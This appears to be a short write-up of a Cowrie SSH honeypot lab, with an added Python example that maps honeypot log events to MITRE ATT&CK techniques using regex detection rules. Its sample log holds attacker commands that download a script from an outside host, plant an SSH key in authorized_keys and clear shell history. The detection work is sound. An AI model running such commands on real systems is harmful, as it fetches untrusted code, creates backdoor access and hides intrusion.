How I Set Up a Cowrie Honeypot to Capture Real SSH Attacks

This project documents the deployment of a Cowrie honeypot on Ubuntu to capture and analyze real-time SSH intrusion behavior. From setting up port forwarding to logging attacker actions and mapping them to MITRE ATT&CK techniques, the piece walks through each stage of the attack lifecycle—from initial enumeration to attempted persistence and evasion. Using Python, regex, and data visualizations, the article serves as a practical cybersecurity lab and an ideal portfolio project for aspiring threat hunters and SOC analysts.
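An added example, not code from the article: one way the regex-based mapping of Cowrie events to MITRE ATT&CK techniques could look in Python. The log lines are constructed in the shape of Cowrie's JSON output, and the rule set and the `map_events` name are assumptions.

```python
import json
import re
from collections import Counter

# Constructed sample in the shape of Cowrie's JSON log (one event per line).
SAMPLE_LOG = """\
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.5", "username": "root", "password": "123456", "session": "a1"}
{"eventid": "cowrie.login.success", "src_ip": "203.0.113.5", "username": "root", "password": "admin", "session": "a1"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.5", "input": "uname -a; cat /proc/cpuinfo", "session": "a1"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.5", "input": "wget http://198.51.100.7/x.sh -O /tmp/x.sh", "session": "a1"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.5", "input": "echo 'ssh-rsa AAAA' >> ~/.ssh/authorized_keys", "session": "a1"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.5", "input": "history -c", "session": "a1"}
not-json garbage line
"""

# Assumed, illustrative rule set: command regex -> ATT&CK technique ID.
RULES = [
    (re.compile(r"\buname\b|\blscpu\b|/proc/cpuinfo"), "T1082"),  # System Information Discovery
    (re.compile(r"\b(wget|curl|tftp)\b"), "T1105"),               # Ingress Tool Transfer
    (re.compile(r"authorized_keys"), "T1098.004"),                # SSH Authorized Keys
    (re.compile(r"\bcrontab\b|/etc/cron"), "T1053.003"),          # Scheduled Task/Job: Cron
    (re.compile(r"history\s+-c|unset\s+HISTFILE"), "T1070.003"),  # Clear Command History
]

def map_events(lines):
    """Return {session_id: Counter(technique_id -> hits)} for Cowrie JSON lines."""
    sessions = {}
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines instead of aborting
        if not isinstance(event, dict):
            continue
        hits = sessions.setdefault(event.get("session", "unknown"), Counter())
        event_id = event.get("eventid", "")
        if event_id == "cowrie.login.failed":
            hits["T1110"] += 1  # failed password logins counted toward Brute Force
        elif event_id == "cowrie.command.input":
            for pattern, technique in RULES:
                if pattern.search(event.get("input", "")):
                    hits[technique] += 1
    return sessions

if __name__ == "__main__":
    for session, hits in map_events(SAMPLE_LOG.splitlines()).items():
        print(session, dict(hits))
```
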
